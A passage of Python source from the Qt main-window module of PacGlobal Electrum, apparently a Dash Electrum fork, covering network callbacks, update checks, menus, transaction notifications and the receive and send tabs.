window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # dash net callbacks self.network.dash_net.register_callback(self.on_dash_net, ['dash-net-updated', 'dash-peers-updated']) self.update_dash_net_status_btn() # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() if getattr(self.wallet.storage, 'backup_message', None): self.show_warning(self.wallet.storage.backup_message, title=_('Information')) #if (self.network # and self.network.tor_auto_on and not self.network.tor_on): # self.show_warning(self.network.tor_warn_msg + # self.network.tor_docs_uri_qt, rich_text=True) # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="PacGlobal Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of PacGlobal Electrum.") + " " + _("Would you like to be notified when there is a newer version of PacGlobal Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to PacGlobal Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def on_history(self, b): self.wallet.clear_coin_price_cache() self.new_fx_history_signal.emit() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(str(e)) def on_network(self, event, *args): if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event in ['status', 'banner', 'verified', 'fee', 'proposals', 'fee_histogram']: # Handle in GUI thread self.network_signal.emit(event, args) else: self.logger.info(f"unexpected network message: {event} {args}") def on_dash_net(self, event, *args): self.gui_object.dash_net_sobj.main.emit(event, args) def on_dash_net_qt(self, event, args=None): self.update_dash_net_status_btn() def update_dash_net_status_btn(self): net = self.network icon = (net.dash_net.status_icon() if net else 'dash_net_off.png') self.dash_net_button.setIcon(read_QIcon(icon)) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() elif event == 'proposals': self.proposals_changed() else: self.logger.info(f"unexpected network_qt signal: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.masternode_manager = MasternodeManager(self.wallet, self.config) self.dip3_tab.w_model.reload_data() self.dip3_tab.update_wallet_label() self.update_recently_visited(wallet.storage.path) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "PacGlobal Electrum Testnet" if constants.net.TESTNET else "PacGlobal Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend PACGlobal coins with it."), _("Make sure you own the seed phrase or the private keys, before you request PACGlobal coins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main PACGlobal network. It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("PacGlobal Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.dip3_tab) add_toggle_action(view_menu, self.console_tab) wallet_menu.addSeparator() wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("PacGlobal Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.dash.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("https://docs.dash.org/en/stable/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents) self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True) self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=False)) self._auto_crash_reports.triggered.connect(self.auto_crash_reports) help_menu.addAction(self._auto_crash_reports) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def auto_crash_reports(self, state): self.config.set_key(BaseCrashReporter.config_key, state) self.setup_exception_hook() def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().host self.pay_to_URI('dash:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "PacGlobal Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying PACGlobal.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the PACGlobal system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(self, version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of PacGlobal Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="PacGlobal Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue total_amount += v self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(v))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("PacGlobal Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("PacGlobal Electrum", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def timer_actions(self): # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): # fee_rate is in duffs/kB return format_fee_satoshis(fee_rate, num_zeros=self.num_zeros) + ' duffs/kB' def get_decimal_point(self): return self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): self.masternode_manager.send_subscriptions() server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_proposals_tab() self.update_completions() def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l l.setObjectName("history_container") toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_history', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_address_e = ButtonsLineEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) msg = _('PACGlobal address where the payment should be received. Note that each payment request uses a different PACGlobal address.') self.receive_address_label = HelpLabel(_('Receiving address'), msg) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) grid.addWidget(self.receive_address_label, 0, 0) grid.addWidget(self.receive_address_e, 0, 1, 1, -1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 1, 0) grid.addWidget(self.receive_message_e, 1, 1, 1, -1) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 2, 0) grid.addWidget(self.receive_amount_e, 2, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() self.expires_combo.addItems([i[0] for i in expiration_values]) self.expires_combo.setCurrentIndex(3) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding PACGlobal addresses.'), _('The PACGlobal address never expires and will always be part of this PacGlobal Electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0) grid.addWidget(self.expires_combo, 3, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 3, 1) self.save_request_button = QPushButton(_('Save')) self.save_request_button.clicked.connect(self.save_payment_request) self.new_request_button = QPushButton(_('New')) self.new_request_button.clicked.connect(self.new_payment_request) self.receive_qr = QRCodeWidget(fixedSize=200) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_request_button) buttons.addWidget(self.new_request_button) grid.addLayout(buttons, 4, 1, 1, 2) self.receive_requests_label = QLabel(_('Requests')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addWidget(self.receive_qr) w = QWidget() w.setObjectName("receive_container") w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_payment_request(self, addr): self.wallet.remove_payment_request(addr, self.config) self.request_list.update() self.clear_receive_tab() def get_request_URI(self, addr): req = self.wallet.receive_requests[addr] message = self.wallet.labels.get(addr, '') amount = req['amount'] extra_query_params = {} if req.get('time'): extra_query_params['time'] = str(int(req.get('time'))) if req.get('exp'): extra_query_params['exp'] = str(int(req.get('exp'))) if req.get('name') and req.get('sig'): sig = bfh(req.get('sig')) sig = bitcoin.base_encode(sig, base=58) extra_query_params['name'] = req['name'] extra_query_params['sig'] = sig uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params) return str(uri) def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(str(e)) return else: return def save_payment_request(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() if not message and not amount: self.show_error(_('No message or amount')) return False i = self.expires_combo.currentIndex() expiration = list(map(lambda x: x[1], expiration_values))[i] req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req, self.config) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + str(e)) else: self.sign_payment_request(addr) self.save_request_button.setEnabled(False) finally: self.request_list.update() self.address_list.update() def view_and_paste(self, title, msg, data): dialog = WindowModalDialog(self, title) vbox = QVBoxLayout() label = QLabel(msg) label.setWordWrap(True) vbox.addWidget(label) pr_e = ShowQRTextEdit(text=data) vbox.addWidget(pr_e) vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog))) dialog.setLayout(vbox) dialog.exec_() def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def new_payment_request(self): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) self.set_receive_address(addr) self.expires_label.hide() self.expires_combo.show() self.new_request_button.setEnabled(False) self.receive_message_e.setFocus(1) def set_receive_address(self, addr): self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) def clear_receive_tab(self): try: addr = self.wallet.get_receiving_address() or '' except InternalAddressCorruption as e: self.show_error(str(e)) addr = '' self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) self.new_request_button.setEnabled(True) def update_receive_qr(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() self.save_request_button.setEnabled((amount is not None) or (message != "")) uri = util.create_bip21_uri(addr, amount, message) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} duffs are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a PACGlobal address, a label from 